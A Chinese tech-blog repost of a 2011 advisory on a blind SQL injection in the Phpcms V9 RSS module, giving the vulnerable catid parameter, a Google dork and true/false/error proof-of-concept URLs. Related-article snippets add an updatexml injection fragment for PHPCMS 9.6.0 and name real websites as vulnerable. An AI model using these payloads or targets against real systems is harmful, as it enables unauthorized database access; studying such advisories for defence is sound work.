Phpcms V9 网站管理系统 SQL 盲注入漏洞

最新推荐文章于 2023-09-11 17:53:44 发布
最新推荐文章于 2023-09-11 17:53:44 发布
阅读量1.6k 收藏
点赞数
分类专栏: ccbz^漏洞整理 文章标签: sql google mysql table 2010

=================================================================
Phpcms V9 BLind SQL Injection Vulnerability
非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了……
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Software: Phpcms V9
        Vendor: www.Phpcms.cn
        Vuln Type: BLind SQL Injection
        Download link: http://www.Phpcms.cn/2010/1229/326.html
        Author: eidelweiss
        contact: eidelweiss[at]windowslive[dot]com
        Home: www.eidelweiss.info
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Google Dork:
            http://www.exploit-db.com/ghdb/3676/    //check here ^_^
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        References:
            http://eidelweiss-advisories.blogspot.com/2011/01/Phpcms-v9-blind-sql-injection.html
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
            exploit & p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] index.php?m=content&c=rss&catid=[valid catid]
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

            Example p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] http://host/index.php?m=content&c=rss&catid=10  <= True
        [!] http://host/index.php?m=content&c=rss&catid=-10 <= False
        [+] http://host/index.php?m=content&c=rss&catid=5   <= show MySQL Error (table)
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

    Phpcms V9 网站管理系统 SQL 盲注入漏洞,Phpcms V9 BLind SQL Injection Vulnerability,Phpcms V9 网站内容管理系统SQL注入,Phpcms V9 网站管理系统SQL盲注。

hkccbz
关注
专栏目录
PHPCMS V9专题模块注漏洞的分析与修复方法
09-29
PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS),它提供了丰富的功能来帮助用户构建和管理网站。然而,即便是这样成熟的产品,在实际应用过程中也会存在一些安全问题。本次讨论的是...
PHPCMS V9 常见问题解决方案汇总.rar
07-09
安全方面,PHPCMS V9 的用户需要关注SQL、XSS攻击、文件上传漏洞等常见安全风险。定期更新系统、严格过滤用户输、合理设置文件权限,以及使用防火墙和安全插件,都是保障网站安全的有效手段。 最后,PHPCMS ...
PHPCMS V9爆出多个SQL漏洞
weixin_30653023的博客
09-13 262
phpcms 使用sys_auth函数加解密cookie信息,系统中多个文件直接从cookie中获取变量进程序流程。 由于sys_auth函数在设计和使用过程中存在缺陷,导致注册用户可以伪造cookie数据,触发SQL等多个二次攻击。 看sys_auth函数代码 //libs/functions/global.func.php function sys_auth($txt, $opera...
php v9 sql,PHPCMS v9 SQL
weixin_29920697的博客
03-17 449
2013 年 2 月 4 日 by lanu文章题目:[漏洞分析]PHPCMS v9 SQL作 者:L.N. && n3w1yb1r7h时 间:2013-02-03声 明:此漏洞非本人首发,在此只作代码分析。漏洞分析:漏洞文件:/phpcms/modules/member/index.php[php]public functi...
php 牛牛漏洞,phpcms v9 SQL漏洞(第二弹)
weixin_35062801的博客
03-29 1177
第二次玩乌云,等待乌云发BB漏洞文件发生在phpcms\modules\member\index.php中392行public function account_manage_info() { // account_manage_info方法,就是更新个人资料if(isset($_POST['dosubmit'])) {//更新用户昵称$nickname = isset($_POST['nickn...
PHPCMS V9 BLind SQL Injection Vulnerability
weixin_34037977的博客
04-10 83
见:http://seclists.org/bugtraq/2011/Jan/139 例如北大的一个网站: http://www.cala.pku.edu.cn/index.php?m=content&c=rss&catid=5&siteid=1 又如: http://www.kuqiwan.com/index.php?m=content&c=rss&a...
PHPCMS V9 视频分享模块SQL注射漏洞分析
weixin_33720956的博客
12-25 88
其实这个0day前几天就发现了,只是今天放出来是因为我最重要的人。。   废话不多说了,直接上代码分析          \phpcms\modules\video.php(78行代码) /** * * 视频添加方法 */ public function add() { if ($_POST['dosubmit']) { ...
PHPCMS网站系统源码官方版 v9.3.4
04-02
PHPCMS V9在保留2008版的特点的同时,对新版本作出重大的创新,为此我们做出了巨大的努力,希望能为更多的站长提供优质的建站系统! PHPCMS V9目前已提供文章、图片、下载等内容模型,在此基础上可非常方便的扩展出...
phpcmsv9最新利用工具
04-01
phpcmsV9是一款广泛应用的开源内容管理系统,以其强大的功能和易用性深受广大网站开发者喜爱。然而,随着系统的广泛使用,安全问题逐渐凸显,其中就包括了描述中提到的“phpcmsv9最新利用工具”。这个工具的出现,...
PHPCMS V9留言板2.2 GBK版
06-06
1. **PHPCMS V9**:PHPCMS 是一款开源的内容管理系统,采用模块化开发,支持多语言,具备强大的内容发布、管理、采集、审核等功能。V9是其一个重要版本,提供了更加完善的后台管理和前端展示模板。 2. **GBK编码**...
phpcms V9代码审计——后台getshell+sql
Zlirving_的博客
02-02 1233
漏洞点 —— 模板写phpcms\modules\dbsource\data.php文件里有个add()函数 在80行有个fileputcontent()函数,将$str写caches\caches_template\dbsource\$id.php文件当中。追踪$str,首先是查询了数据库的$id行template的值,然后经过template_cache系统类的template_parse方法对模板内容的过滤 phpcms\libs\classes\template_cache.class.p
最新phpcms v9.6.0 sql漏洞分析
aiquan9342的博客
04-10 444
昨天爆出来的,但其实在此之前就i记得在某群看见有大牛在群里装逼了。一直也没肯告诉。现在爆出来了。就来分析一下。官方现在也还没给出修复。该文不给出任何利用的EXP。 该文只做安全研究,不做任何恶意攻击!否则一切后果自负! 问题函数:swfupload_json 所在所在地址:phpcms/modules/attachment/attachments.php 看到src这个参数被...
phpcmsV9sql注射漏洞及修复
weixin_34248118的博客
07-10 306
phpcmsV9sql注射漏洞及修复2014-05-24 0个评论 收藏我要投稿 别人说最危险的地方最安全,我说最安全的地方最危险。。。相信你们也没有想到这个最常见,常常会在各种教程出现的地方会存在SQL注射。。。需 GPC OFF首先,我们看登陆的地方。。最常见了吧。。。 http://127.0.0.1/index.php?m=member&c=in...
php v9 sql,phpcmsv9最新高危sqlexp
weixin_35545345的博客
03-17 247
获取当前数据库http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=loginpost:forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&a...
Phpcms V9 uc api SQL漏洞
hacke2' Blog
02-08 2986
http://bbs.wolvez.org/viewtopic.php?id=256 漏洞分析: 1.未启用ucenter服务的情况下uc_key为空 define('UC_KEY', pc_base::load_config('system', 'uc_key')); 2. deleteuser接口存在SQL漏洞,UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存
phpcms V9 BLind SQL Injection Vulnerability
weixin_34212762的博客
01-23 96
================================================================= phpcms V9 BLind SQL Injection Vulnerability ================================================================= ...
2-PHP代码审计——PHPCMSV9.6.0 sql漏洞
网络安全
03-31 1886
漏洞环境:PHPCMSV9.6 实验环境的poc: /index.php?m=wap&c=index&siteid=1 userid_flash=b3a3Dv_ICFSxJ_SDlQhbf6cdklSxsLje2RJwBTGknbusMO0 /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Ccon..
PHPCMS V9.6.0 SQL漏洞分析
weixin_30919429的博客
05-10 2495
0x01 此SQL漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似。且较为有趣,故在此分析并附上exp。 0x02 首先复现漏洞,环境为:   PHP:5.4.45 + Apache   mysql:5.5.53   PHPCMSV9.6.0-UTF-8   Microsoft Windows 7 旗舰版OS 版本: 6.1.7601 Service...
phpcmsV9.6.0sql漏洞分析
最新发布
shelter1234567的博客
09-11 1548
本次分析phpcmsV9.6.0 的sql漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
PHPCMS V9企业级内容管理系统详解与功能概览
PHPCMS V9是一款由上海盛大网络发展有限公司开发的企业级内容管理系统,它基于PHP和AJAX技术,专注于简化网站内容的创建、维护、发布和管理。本产品白皮书作为用户指南,旨在帮助新老用户更好地理解和掌握这款系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值